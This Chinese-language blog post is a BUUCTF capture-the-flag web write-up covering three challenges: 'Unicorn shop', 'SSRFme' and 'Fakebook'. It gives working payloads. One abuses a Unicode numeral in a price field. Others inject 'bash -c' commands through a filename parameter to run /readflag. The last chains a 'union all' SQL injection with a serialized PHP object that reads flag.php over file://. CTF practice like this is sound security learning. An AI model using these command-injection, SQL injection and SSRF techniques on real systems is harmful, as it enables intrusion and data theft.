BUUCTF web writeup(二)

发表于 | 更新于: | 分类于 | 阅读次数: |
字数统计: 664 字 | 阅读时长 ≈ 3 分钟

Unicorn shop

靶机
这道题想让我们买独角兽,当ID为1,2,3的时候Wrong commodity!,大于4No commodity found!,并且price只允许一个字符Only one char(?) allowed!,那就是要购买4了并且价格那里只能输入一个字符,但是怎么大于1337呢.F12发现网站编码是utf-8,那应该又是编码转换的问题了,在price写万,亿,兆成功获得flag,当然写其他语言的单位也可以,只要大于1337.

SSRFme

靶机

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
      $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

看了大佬们的博客才会的,GET命令漏洞如果文件存在会将其拼接到命令中,具体分析在大佬博客
查询ip:

1
curl -L tool.lu/ip

php -a进入php命令行交互:

1
echo md5("orange".yourip);

扫目录payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#先建个文件
http://web7.buuoj.cn/?url=&filename=bash -c 'ls /'|
#执行命令后输出到chenxiyuan
http://web7.buuoj.cn/?url=file:bash -c 'ls /'|&filename=chenxiyuan
#访问
http://web7.buuoj.cn/sandbox/99ca4e36b9277744c847e190081f7fed/chenxiyuan
'''
bin
boot
dev
etc
flag
home
lib
lib64
media
mnt
opt
proc
readflag
root
run
sbin
srv
sys
tmp
usr
var
'''

应该是执行/readflag来读取flag了,继续构造payload:

1
2
3
4
5
6
#创建文件
http://web7.buuoj.cn/?url=&filename=bash -c /readflag|
#执行命令输出到flag
http://web7.buuoj.cn/?url=file:bash%20-c%20/readflag|&filename=flag
#访问
http://web7.buuoj.cn/sandbox/99ca4e36b9277744c847e190081f7fed/flag

Fakebook

靶机
刚上来注册登录,点用户名进入view.php,它想显示blog的内容审查元素发现是base64编码.看来思路就是利用这个地方了.然后突发奇想看了robots.txt,发现了user.php.bak,并且确实存在flag.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

也没啥利用的地方,但是知道了类的结构.继续看view.php?no=1,首先有order by 4,union被过滤,但是union all可以绕过.再通过其他报错信息可以得到/var/www/html/view.php,还知道必须传入一个序列化对象,最终构造payload:

1
web23.buuoj.cn/view.php?no=0%20union%20all%20select%201,2,3,%27O:8:"UserInfo":3:{s:4:"name";s:3:"age";s:3:"age";i:19;s:4:"blog";s:29:"file:///var/www/html/flag.php";}%27

base64解码就得到flag.